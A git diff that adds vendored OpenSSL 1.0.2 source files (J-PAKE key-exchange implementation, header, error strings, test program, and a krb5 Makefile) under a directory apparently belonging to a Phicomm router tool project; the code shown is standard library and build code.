+    /* t1 = g^b */
+    BN_mod_exp(t1, zkpg, p->zkpx.b, ctx->p.p, ctx->ctx);
+    /* t2 = (g^x)^h = g^{hx} */
+    BN_mod_exp(t2, p->gx, h, ctx->p.p, ctx->ctx);
+    /* t3 = t1 * t2 = g^{hx} * g^b = g^{hx+b} = g^r (allegedly) */
+    BN_mod_mul(t3, t1, t2, ctx->p.p, ctx->ctx);
+
+    /* verify t3 == g^r */
+    if (BN_cmp(t3, p->zkpx.gr) == 0)
+        ret = 1;
+    else
+        JPAKEerr(JPAKE_F_VERIFY_ZKP, JPAKE_R_ZKP_VERIFY_FAILED);
+
+    /* cleanup */
+    BN_free(t3);
+    BN_free(t2);
+    BN_free(t1);
+    BN_free(h);
+
+    return ret;
+}
+
+static void generate_step_part(JPAKE_STEP_PART *p, const BIGNUM *x,
+                               const BIGNUM *g, JPAKE_CTX *ctx)
+{
+    BN_mod_exp(p->gx, g, x, ctx->p.p, ctx->ctx);
+    generate_zkp(p, x, g, ctx);
+}
+
+/* Generate each party's random numbers. xa is in [0, q), xb is in [1, q). */
+static void genrand(JPAKE_CTX *ctx)
+{
+    BIGNUM *qm1;
+
+    /* xa in [0, q) */
+    BN_rand_range(ctx->xa, ctx->p.q);
+
+    /* q-1 */
+    qm1 = BN_new();
+    BN_copy(qm1, ctx->p.q);
+    BN_sub_word(qm1, 1);
+
+    /* ... and xb in [0, q-1) */
+    BN_rand_range(ctx->xb, qm1);
+    /* [1, q) */
+    BN_add_word(ctx->xb, 1);
+
+    /* cleanup */
+    BN_free(qm1);
+}
+
+int JPAKE_STEP1_generate(JPAKE_STEP1 *send, JPAKE_CTX *ctx)
+{
+    genrand(ctx);
+    generate_step_part(&send->p1, ctx->xa, ctx->p.g, ctx);
+    generate_step_part(&send->p2, ctx->xb, ctx->p.g, ctx);
+
+    return 1;
+}
+
+/* g^x is a legal value */
+static int is_legal(const BIGNUM *gx, const JPAKE_CTX *ctx)
+{
+    BIGNUM *t;
+    int res;
+
+    if (BN_is_negative(gx) || BN_is_zero(gx) || BN_cmp(gx, ctx->p.p) >= 0)
+        return 0;
+
+    t = BN_new();
+    BN_mod_exp(t, gx, ctx->p.q, ctx->p.p, ctx->ctx);
+    res = BN_is_one(t);
+    BN_free(t);
+
+    return res;
+}
+
+int JPAKE_STEP1_process(JPAKE_CTX *ctx, const JPAKE_STEP1 *received)
+{
+    if (!is_legal(received->p1.gx, ctx)) {
+        JPAKEerr(JPAKE_F_JPAKE_STEP1_PROCESS,
+                 JPAKE_R_G_TO_THE_X3_IS_NOT_LEGAL);
+        return 0;
+    }
+
+    if (!is_legal(received->p2.gx, ctx)) {
+        JPAKEerr(JPAKE_F_JPAKE_STEP1_PROCESS,
+                 JPAKE_R_G_TO_THE_X4_IS_NOT_LEGAL);
+        return 0;
+    }
+
+    /* verify their ZKP(xc) */
+    if (!verify_zkp(&received->p1, ctx->p.g, ctx)) {
+        JPAKEerr(JPAKE_F_JPAKE_STEP1_PROCESS, JPAKE_R_VERIFY_X3_FAILED);
+        return 0;
+    }
+
+    /* verify their ZKP(xd) */
+    if (!verify_zkp(&received->p2, ctx->p.g, ctx)) {
+        JPAKEerr(JPAKE_F_JPAKE_STEP1_PROCESS, JPAKE_R_VERIFY_X4_FAILED);
+        return 0;
+    }
+
+    /* g^xd != 1 */
+    if (BN_is_one(received->p2.gx)) {
+        JPAKEerr(JPAKE_F_JPAKE_STEP1_PROCESS, JPAKE_R_G_TO_THE_X4_IS_ONE);
+        return 0;
+    }
+
+    /* Save the bits we need for later */
+    BN_copy(ctx->p.gxc, received->p1.gx);
+    BN_copy(ctx->p.gxd, received->p2.gx);
+
+    return 1;
+}
+
+int JPAKE_STEP2_generate(JPAKE_STEP2 *send, JPAKE_CTX *ctx)
+{
+    BIGNUM *t1 = BN_new();
+    BIGNUM *t2 = BN_new();
+
+   /*-
+    * X = g^{(xa + xc + xd) * xb * s}
+    * t1 = g^xa
+    */
+    BN_mod_exp(t1, ctx->p.g, ctx->xa, ctx->p.p, ctx->ctx);
+    /* t2 = t1 * g^{xc} = g^{xa} * g^{xc} = g^{xa + xc} */
+    BN_mod_mul(t2, t1, ctx->p.gxc, ctx->p.p, ctx->ctx);
+    /* t1 = t2 * g^{xd} = g^{xa + xc + xd} */
+    BN_mod_mul(t1, t2, ctx->p.gxd, ctx->p.p, ctx->ctx);
+    /* t2 = xb * s */
+    BN_mod_mul(t2, ctx->xb, ctx->secret, ctx->p.q, ctx->ctx);
+
+   /*-
+    * ZKP(xb * s)
+    * XXX: this is kinda funky, because we're using
+    *
+    * g' = g^{xa + xc + xd}
+    *
+    * as the generator, which means X is g'^{xb * s}
+    * X = t1^{t2} = t1^{xb * s} = g^{(xa + xc + xd) * xb * s}
+    */
+    generate_step_part(send, t2, t1, ctx);
+
+    /* cleanup */
+    BN_free(t1);
+    BN_free(t2);
+
+    return 1;
+}
+
+/* gx = g^{xc + xa + xb} * xd * s */
+static int compute_key(JPAKE_CTX *ctx, const BIGNUM *gx)
+{
+    BIGNUM *t1 = BN_new();
+    BIGNUM *t2 = BN_new();
+    BIGNUM *t3 = BN_new();
+
+   /*-
+    * K = (gx/g^{xb * xd * s})^{xb}
+    *   = (g^{(xc + xa + xb) * xd * s - xb * xd *s})^{xb}
+    *   = (g^{(xa + xc) * xd * s})^{xb}
+    *   = g^{(xa + xc) * xb * xd * s}
+    * [which is the same regardless of who calculates it]
+    */
+
+    /* t1 = (g^{xd})^{xb} = g^{xb * xd} */
+    BN_mod_exp(t1, ctx->p.gxd, ctx->xb, ctx->p.p, ctx->ctx);
+    /* t2 = -s = q-s */
+    BN_sub(t2, ctx->p.q, ctx->secret);
+    /* t3 = t1^t2 = g^{-xb * xd * s} */
+    BN_mod_exp(t3, t1, t2, ctx->p.p, ctx->ctx);
+    /* t1 = gx * t3 = X/g^{xb * xd * s} */
+    BN_mod_mul(t1, gx, t3, ctx->p.p, ctx->ctx);
+    /* K = t1^{xb} */
+    BN_mod_exp(ctx->key, t1, ctx->xb, ctx->p.p, ctx->ctx);
+
+    /* cleanup */
+    BN_free(t3);
+    BN_free(t2);
+    BN_free(t1);
+
+    return 1;
+}
+
+int JPAKE_STEP2_process(JPAKE_CTX *ctx, const JPAKE_STEP2 *received)
+{
+    BIGNUM *t1 = BN_new();
+    BIGNUM *t2 = BN_new();
+    int ret = 0;
+
+   /*-
+    * g' = g^{xc + xa + xb} [from our POV]
+    * t1 = xa + xb
+    */
+    BN_mod_add(t1, ctx->xa, ctx->xb, ctx->p.q, ctx->ctx);
+    /* t2 = g^{t1} = g^{xa+xb} */
+    BN_mod_exp(t2, ctx->p.g, t1, ctx->p.p, ctx->ctx);
+    /* t1 = g^{xc} * t2 = g^{xc + xa + xb} */
+    BN_mod_mul(t1, ctx->p.gxc, t2, ctx->p.p, ctx->ctx);
+
+    if (verify_zkp(received, t1, ctx))
+        ret = 1;
+    else
+        JPAKEerr(JPAKE_F_JPAKE_STEP2_PROCESS, JPAKE_R_VERIFY_B_FAILED);
+
+    compute_key(ctx, received->gx);
+
+    /* cleanup */
+    BN_free(t2);
+    BN_free(t1);
+
+    return ret;
+}
+
+static void quickhashbn(unsigned char *md, const BIGNUM *bn)
+{
+    SHA_CTX sha;
+
+    SHA1_Init(&sha);
+    hashbn(&sha, bn);
+    SHA1_Final(md, &sha);
+}
+
+void JPAKE_STEP3A_init(JPAKE_STEP3A *s3a)
+{
+}
+
+int JPAKE_STEP3A_generate(JPAKE_STEP3A *send, JPAKE_CTX *ctx)
+{
+    quickhashbn(send->hhk, ctx->key);
+    SHA1(send->hhk, sizeof send->hhk, send->hhk);
+
+    return 1;
+}
+
+int JPAKE_STEP3A_process(JPAKE_CTX *ctx, const JPAKE_STEP3A *received)
+{
+    unsigned char hhk[SHA_DIGEST_LENGTH];
+
+    quickhashbn(hhk, ctx->key);
+    SHA1(hhk, sizeof hhk, hhk);
+    if (memcmp(hhk, received->hhk, sizeof hhk)) {
+        JPAKEerr(JPAKE_F_JPAKE_STEP3A_PROCESS,
+                 JPAKE_R_HASH_OF_HASH_OF_KEY_MISMATCH);
+        return 0;
+    }
+    return 1;
+}
+
+void JPAKE_STEP3A_release(JPAKE_STEP3A *s3a)
+{
+}
+
+void JPAKE_STEP3B_init(JPAKE_STEP3B *s3b)
+{
+}
+
+int JPAKE_STEP3B_generate(JPAKE_STEP3B *send, JPAKE_CTX *ctx)
+{
+    quickhashbn(send->hk, ctx->key);
+
+    return 1;
+}
+
+int JPAKE_STEP3B_process(JPAKE_CTX *ctx, const JPAKE_STEP3B *received)
+{
+    unsigned char hk[SHA_DIGEST_LENGTH];
+
+    quickhashbn(hk, ctx->key);
+    if (memcmp(hk, received->hk, sizeof hk)) {
+        JPAKEerr(JPAKE_F_JPAKE_STEP3B_PROCESS, JPAKE_R_HASH_OF_KEY_MISMATCH);
+        return 0;
+    }
+    return 1;
+}
+
+void JPAKE_STEP3B_release(JPAKE_STEP3B *s3b)
+{
+}
+
+const BIGNUM *JPAKE_get_shared_key(JPAKE_CTX *ctx)
+{
+    return ctx->key;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/jpake/jpake.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/jpake/jpake.h
new file mode 100644
index 0000000..371eed6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/jpake/jpake.h
@@ -0,0 +1,128 @@
+/*
+ * Implement J-PAKE, as described in
+ * http://grouper.ieee.org/groups/1363/Research/contributions/hao-ryan-2008.pdf
+ *
+ * With hints from http://www.cl.cam.ac.uk/~fh240/software/JPAKE2.java.
+ */
+
+#ifndef HEADER_JPAKE_H
+# define HEADER_JPAKE_H
+
+# include <openssl/opensslconf.h>
+
+# ifdef OPENSSL_NO_JPAKE
+#  error JPAKE is disabled.
+# endif
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# include <openssl/bn.h>
+# include <openssl/sha.h>
+
+typedef struct JPAKE_CTX JPAKE_CTX;
+
+/* Note that "g" in the ZKPs is not necessarily the J-PAKE g. */
+typedef struct {
+    BIGNUM *gr;                 /* g^r (r random) */
+    BIGNUM *b;                  /* b = r - x*h, h=hash(g, g^r, g^x, name) */
+} JPAKE_ZKP;
+
+typedef struct {
+    BIGNUM *gx;                 /* g^x in step 1, g^(xa + xc + xd) * xb * s
+                                 * in step 2 */
+    JPAKE_ZKP zkpx;             /* ZKP(x) or ZKP(xb * s) */
+} JPAKE_STEP_PART;
+
+typedef struct {
+    JPAKE_STEP_PART p1;         /* g^x3, ZKP(x3) or g^x1, ZKP(x1) */
+    JPAKE_STEP_PART p2;         /* g^x4, ZKP(x4) or g^x2, ZKP(x2) */
+} JPAKE_STEP1;
+
+typedef JPAKE_STEP_PART JPAKE_STEP2;
+
+typedef struct {
+    unsigned char hhk[SHA_DIGEST_LENGTH];
+} JPAKE_STEP3A;
+
+typedef struct {
+    unsigned char hk[SHA_DIGEST_LENGTH];
+} JPAKE_STEP3B;
+
+/* Parameters are copied */
+JPAKE_CTX *JPAKE_CTX_new(const char *name, const char *peer_name,
+                         const BIGNUM *p, const BIGNUM *g, const BIGNUM *q,
+                         const BIGNUM *secret);
+void JPAKE_CTX_free(JPAKE_CTX *ctx);
+
+/*
+ * Note that JPAKE_STEP1 can be used multiple times before release
+ * without another init.
+ */
+void JPAKE_STEP1_init(JPAKE_STEP1 *s1);
+int JPAKE_STEP1_generate(JPAKE_STEP1 *send, JPAKE_CTX *ctx);
+int JPAKE_STEP1_process(JPAKE_CTX *ctx, const JPAKE_STEP1 *received);
+void JPAKE_STEP1_release(JPAKE_STEP1 *s1);
+
+/*
+ * Note that JPAKE_STEP2 can be used multiple times before release
+ * without another init.
+ */
+void JPAKE_STEP2_init(JPAKE_STEP2 *s2);
+int JPAKE_STEP2_generate(JPAKE_STEP2 *send, JPAKE_CTX *ctx);
+int JPAKE_STEP2_process(JPAKE_CTX *ctx, const JPAKE_STEP2 *received);
+void JPAKE_STEP2_release(JPAKE_STEP2 *s2);
+
+/*
+ * Optionally verify the shared key. If the shared secrets do not
+ * match, the two ends will disagree about the shared key, but
+ * otherwise the protocol will succeed.
+ */
+void JPAKE_STEP3A_init(JPAKE_STEP3A *s3a);
+int JPAKE_STEP3A_generate(JPAKE_STEP3A *send, JPAKE_CTX *ctx);
+int JPAKE_STEP3A_process(JPAKE_CTX *ctx, const JPAKE_STEP3A *received);
+void JPAKE_STEP3A_release(JPAKE_STEP3A *s3a);
+
+void JPAKE_STEP3B_init(JPAKE_STEP3B *s3b);
+int JPAKE_STEP3B_generate(JPAKE_STEP3B *send, JPAKE_CTX *ctx);
+int JPAKE_STEP3B_process(JPAKE_CTX *ctx, const JPAKE_STEP3B *received);
+void JPAKE_STEP3B_release(JPAKE_STEP3B *s3b);
+
+/*
+ * the return value belongs to the library and will be released when
+ * ctx is released, and will change when a new handshake is performed.
+ */
+const BIGNUM *JPAKE_get_shared_key(JPAKE_CTX *ctx);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_JPAKE_strings(void);
+
+/* Error codes for the JPAKE functions. */
+
+/* Function codes. */
+# define JPAKE_F_JPAKE_STEP1_PROCESS                      101
+# define JPAKE_F_JPAKE_STEP2_PROCESS                      102
+# define JPAKE_F_JPAKE_STEP3A_PROCESS                     103
+# define JPAKE_F_JPAKE_STEP3B_PROCESS                     104
+# define JPAKE_F_VERIFY_ZKP                               100
+
+/* Reason codes. */
+# define JPAKE_R_G_TO_THE_X3_IS_NOT_LEGAL                 108
+# define JPAKE_R_G_TO_THE_X4_IS_NOT_LEGAL                 109
+# define JPAKE_R_G_TO_THE_X4_IS_ONE                       105
+# define JPAKE_R_HASH_OF_HASH_OF_KEY_MISMATCH             106
+# define JPAKE_R_HASH_OF_KEY_MISMATCH                     107
+# define JPAKE_R_VERIFY_B_FAILED                          102
+# define JPAKE_R_VERIFY_X3_FAILED                         103
+# define JPAKE_R_VERIFY_X4_FAILED                         104
+# define JPAKE_R_ZKP_VERIFY_FAILED                        100
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/jpake/jpake_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/jpake/jpake_err.c
new file mode 100644
index 0000000..be236d9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/jpake/jpake_err.c
@@ -0,0 +1,108 @@
+/* crypto/jpake/jpake_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2010 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/jpake.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_JPAKE,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_JPAKE,0,reason)
+
+static ERR_STRING_DATA JPAKE_str_functs[] = {
+    {ERR_FUNC(JPAKE_F_JPAKE_STEP1_PROCESS), "JPAKE_STEP1_process"},
+    {ERR_FUNC(JPAKE_F_JPAKE_STEP2_PROCESS), "JPAKE_STEP2_process"},
+    {ERR_FUNC(JPAKE_F_JPAKE_STEP3A_PROCESS), "JPAKE_STEP3A_process"},
+    {ERR_FUNC(JPAKE_F_JPAKE_STEP3B_PROCESS), "JPAKE_STEP3B_process"},
+    {ERR_FUNC(JPAKE_F_VERIFY_ZKP), "VERIFY_ZKP"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA JPAKE_str_reasons[] = {
+    {ERR_REASON(JPAKE_R_G_TO_THE_X3_IS_NOT_LEGAL),
+     "g to the x3 is not legal"},
+    {ERR_REASON(JPAKE_R_G_TO_THE_X4_IS_NOT_LEGAL),
+     "g to the x4 is not legal"},
+    {ERR_REASON(JPAKE_R_G_TO_THE_X4_IS_ONE), "g to the x4 is one"},
+    {ERR_REASON(JPAKE_R_HASH_OF_HASH_OF_KEY_MISMATCH),
+     "hash of hash of key mismatch"},
+    {ERR_REASON(JPAKE_R_HASH_OF_KEY_MISMATCH), "hash of key mismatch"},
+    {ERR_REASON(JPAKE_R_VERIFY_B_FAILED), "verify b failed"},
+    {ERR_REASON(JPAKE_R_VERIFY_X3_FAILED), "verify x3 failed"},
+    {ERR_REASON(JPAKE_R_VERIFY_X4_FAILED), "verify x4 failed"},
+    {ERR_REASON(JPAKE_R_ZKP_VERIFY_FAILED), "zkp verify failed"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_JPAKE_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(JPAKE_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, JPAKE_str_functs);
+        ERR_load_strings(0, JPAKE_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/jpake/jpaketest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/jpake/jpaketest.c
new file mode 100644
index 0000000..ef9e54b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/jpake/jpaketest.c
@@ -0,0 +1,185 @@
+#include <openssl/opensslconf.h>
+
+#ifdef OPENSSL_NO_JPAKE
+
+# include <stdio.h>
+
+int main(int argc, char *argv[])
+{
+    printf("No J-PAKE support\n");
+    return (0);
+}
+
+#else
+
+# include <openssl/jpake.h>
+# include <openssl/err.h>
+
+static void showbn(const char *name, const BIGNUM *bn)
+{
+    fputs(name, stdout);
+    fputs(" = ", stdout);
+    BN_print_fp(stdout, bn);
+    putc('\n', stdout);
+}
+
+static int run_jpake(JPAKE_CTX *alice, JPAKE_CTX *bob)
+{
+    JPAKE_STEP1 alice_s1;
+    JPAKE_STEP1 bob_s1;
+    JPAKE_STEP2 alice_s2;
+    JPAKE_STEP2 bob_s2;
+    JPAKE_STEP3A alice_s3a;
+    JPAKE_STEP3B bob_s3b;
+
+    /* Alice -> Bob: step 1 */
+    puts("A->B s1");
+    JPAKE_STEP1_init(&alice_s1);
+    JPAKE_STEP1_generate(&alice_s1, alice);
+    if (!JPAKE_STEP1_process(bob, &alice_s1)) {
+        printf("Bob fails to process Alice's step 1\n");
+        ERR_print_errors_fp(stdout);
+        return 1;
+    }
+    JPAKE_STEP1_release(&alice_s1);
+
+    /* Bob -> Alice: step 1 */
+    puts("B->A s1");
+    JPAKE_STEP1_init(&bob_s1);
+    JPAKE_STEP1_generate(&bob_s1, bob);
+    if (!JPAKE_STEP1_process(alice, &bob_s1)) {
+        printf("Alice fails to process Bob's step 1\n");
+        ERR_print_errors_fp(stdout);
+        return 2;
+    }
+    JPAKE_STEP1_release(&bob_s1);
+
+    /* Alice -> Bob: step 2 */
+    puts("A->B s2");
+    JPAKE_STEP2_init(&alice_s2);
+    JPAKE_STEP2_generate(&alice_s2, alice);
+    if (!JPAKE_STEP2_process(bob, &alice_s2)) {
+        printf("Bob fails to process Alice's step 2\n");
+        ERR_print_errors_fp(stdout);
+        return 3;
+    }
+    JPAKE_STEP2_release(&alice_s2);
+
+    /* Bob -> Alice: step 2 */
+    puts("B->A s2");
+    JPAKE_STEP2_init(&bob_s2);
+    JPAKE_STEP2_generate(&bob_s2, bob);
+    if (!JPAKE_STEP2_process(alice, &bob_s2)) {
+        printf("Alice fails to process Bob's step 2\n");
+        ERR_print_errors_fp(stdout);
+        return 4;
+    }
+    JPAKE_STEP2_release(&bob_s2);
+
+    showbn("Alice's key", JPAKE_get_shared_key(alice));
+    showbn("Bob's key  ", JPAKE_get_shared_key(bob));
+
+    /* Alice -> Bob: step 3a */
+    puts("A->B s3a");
+    JPAKE_STEP3A_init(&alice_s3a);
+    JPAKE_STEP3A_generate(&alice_s3a, alice);
+    if (!JPAKE_STEP3A_process(bob, &alice_s3a)) {
+        printf("Bob fails to process Alice's step 3a\n");
+        ERR_print_errors_fp(stdout);
+        return 5;
+    }
+    JPAKE_STEP3A_release(&alice_s3a);
+
+    /* Bob -> Alice: step 3b */
+    puts("B->A s3b");
+    JPAKE_STEP3B_init(&bob_s3b);
+    JPAKE_STEP3B_generate(&bob_s3b, bob);
+    if (!JPAKE_STEP3B_process(alice, &bob_s3b)) {
+        printf("Alice fails to process Bob's step 3b\n");
+        ERR_print_errors_fp(stdout);
+        return 6;
+    }
+    JPAKE_STEP3B_release(&bob_s3b);
+
+    return 0;
+}
+
+int main(int argc, char **argv)
+{
+    JPAKE_CTX *alice;
+    JPAKE_CTX *bob;
+    BIGNUM *p = NULL;
+    BIGNUM *g = NULL;
+    BIGNUM *q = NULL;
+    BIGNUM *secret = BN_new();
+    BIO *bio_err;
+
+    bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    CRYPTO_malloc_debug_init();
+    CRYPTO_dbg_set_options(V_CRYPTO_MDEBUG_ALL);
+    CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON);
+
+    ERR_load_crypto_strings();
+
+    /*-
+    BN_hex2bn(&p, "fd7f53811d75122952df4a9c2eece4e7f611b7523cef4400c31e3f80b6512669455d402251fb593d8d58fabfc5f5ba30f6cb9b556cd7813b801d346ff26660b76b9950a5a49f9fe8047b1022c24fbba9d7feb7c61bf83b57e7c6a8a6150f04fb83f6d3c51ec3023554135a169132f675f3ae2b61d72aeff22203199dd14801c7");
+    BN_hex2bn(&g, "f7e1a085d69b3ddecbbcab5c36b857b97994afbbfa3aea82f9574c0b3d0782675159578ebad4594fe67107108180b449167123e84c281613b7cf09328cc8a6e13c167a8b547c8d28e0a3ae1e2bb3a675916ea37f0bfa213562f1fb627a01243bcca4f1bea8519089a883dfe15ae59f06928b665e807b552564014c3bfecf492a");
+    BN_hex2bn(&q, "9760508f15230bccb292b982a2eb840bf0581cf5");
+    */
+    /*-
+    p = BN_new();
+    BN_generate_prime(p, 1024, 1, NULL, NULL, NULL, NULL);
+    */
+    /* Use a safe prime for p (that we found earlier) */
+    BN_hex2bn(&p,
+              "F9E5B365665EA7A05A9C534502780FEE6F1AB5BD4F49947FD036DBD7E905269AF46EF28B0FC07487EE4F5D20FB3C0AF8E700F3A2FA3414970CBED44FEDFF80CE78D800F184BB82435D137AADA2C6C16523247930A63B85661D1FC817A51ACD96168E95898A1F83A79FFB529368AA7833ABD1B0C3AEDDB14D2E1A2F71D99F763F");
+    showbn("p", p);
+    g = BN_new();
+    BN_set_word(g, 2);
+    showbn("g", g);
+    q = BN_new();
+    BN_rshift1(q, p);
+    showbn("q", q);
+
+    BN_rand(secret, 32, -1, 0);
+
+    /* A normal run, expect this to work... */
+    alice = JPAKE_CTX_new("Alice", "Bob", p, g, q, secret);
+    bob = JPAKE_CTX_new("Bob", "Alice", p, g, q, secret);
+
+    if (run_jpake(alice, bob) != 0) {
+        fprintf(stderr, "Plain JPAKE run failed\n");
+        return 1;
+    }
+
+    JPAKE_CTX_free(bob);
+    JPAKE_CTX_free(alice);
+
+    /* Now give Alice and Bob different secrets */
+    alice = JPAKE_CTX_new("Alice", "Bob", p, g, q, secret);
+    BN_add_word(secret, 1);
+    bob = JPAKE_CTX_new("Bob", "Alice", p, g, q, secret);
+
+    if (run_jpake(alice, bob) != 5) {
+        fprintf(stderr, "Mismatched secret JPAKE run failed\n");
+        return 1;
+    }
+
+    JPAKE_CTX_free(bob);
+    JPAKE_CTX_free(alice);
+
+    BN_free(secret);
+    BN_free(q);
+    BN_free(g);
+    BN_free(p);
+
+    CRYPTO_cleanup_all_ex_data();
+    ERR_remove_thread_state(NULL);
+    ERR_free_strings();
+    CRYPTO_mem_leaks(bio_err);
+
+    return 0;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/Makefile
new file mode 100644
index 0000000..1407739
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/Makefile
@@ -0,0 +1,84 @@
+#
+# OpenSSL/krb5/Makefile
+#
+
+DIR=	krb5
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= krb5_asn.c
+
+LIBOBJ= krb5_asn.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= krb5_asn.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+krb5_asn.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+krb5_asn.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+krb5_asn.o: ../../include/openssl/e_os2.h ../../include/openssl/krb5_asn.h
+krb5_asn.o: ../../include/openssl/opensslconf.h
+krb5_asn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+krb5_asn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+krb5_asn.o: ../../include/openssl/symhacks.h krb5_asn.c
